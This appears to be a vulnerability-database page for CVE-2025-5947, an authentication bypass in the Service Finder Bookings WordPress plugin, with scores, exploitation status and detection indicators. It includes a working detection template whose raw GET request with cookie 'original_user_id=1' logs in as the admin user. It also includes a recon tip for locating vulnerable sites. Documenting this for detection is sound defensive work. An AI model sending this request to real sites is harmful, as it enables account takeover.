cbcvebase.
CVE-2025-5947
published 2025-08-01

CVE-2025-5947: The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via authentication bypass in all versions up to, and including, 6.0…

PriorityP187critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
5.70%
92.0th percentile
The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via authentication bypass in all versions up to, and including, 6.0. This is due to the plugin not properly validating a user's cookie value prior to logging them in through the service_finder_switch_back() function. This makes it possible for unauthenticated attackers to login as any user including admins.

Affected

1 ranges
VendorProductVersion rangeFixed in
aonethemeservice_finder_bookings<= 6.0

Detection & IOCsextracted from sources · hover to see the quote

cookieoriginal_user_id=1
url/wp-admin/admin-ajax.php?action=service_finder_switch_back
path/wp-content/plugins/sf-booking/
sigma
id: CVE-2025-5947
info:
  name: Service Finder Bookings - Authentication Bypass
  author: sedat4ras
  severity: critical
http:
- raw:
  - |
    GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
    Host: {{Hostname}}
    Cookie: original_user_id=1
matchers-condition: and
matchers:
- type: regex
  part: header
  regex:
  - '(?i)Location:.*\/wp-admin\/'
- type: regex
  part: header
  regex:
  - '(?i)Set-Cookie:.*wordpress_logged_in_'
- type: status
  status:
  - 301
  - 302
  • Exploit requests are HTTP GET to /wp-admin/admin-ajax.php with the query parameter switch_back=1 and a manipulated original_user_id cookie value (e.g., =1 for admin).
  • Review access logs for suspicious newly created accounts that may have been added for persistence after exploitation.
  • Presence of the sf-booking plugin directory at /wp-content/plugins/sf-booking/ can be used to identify vulnerable targets via passive recon (publicwww).
  • ·The vulnerability only affects Service Finder Bookings plugin versions up to and including 6.0; version 6.1 (released July 17) contains the fix.
  • ·Attacker IP addresses used for the campaign are not static; blocklisting the five identified IPs is a partial mitigation only, as attackers can rotate to new ones.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.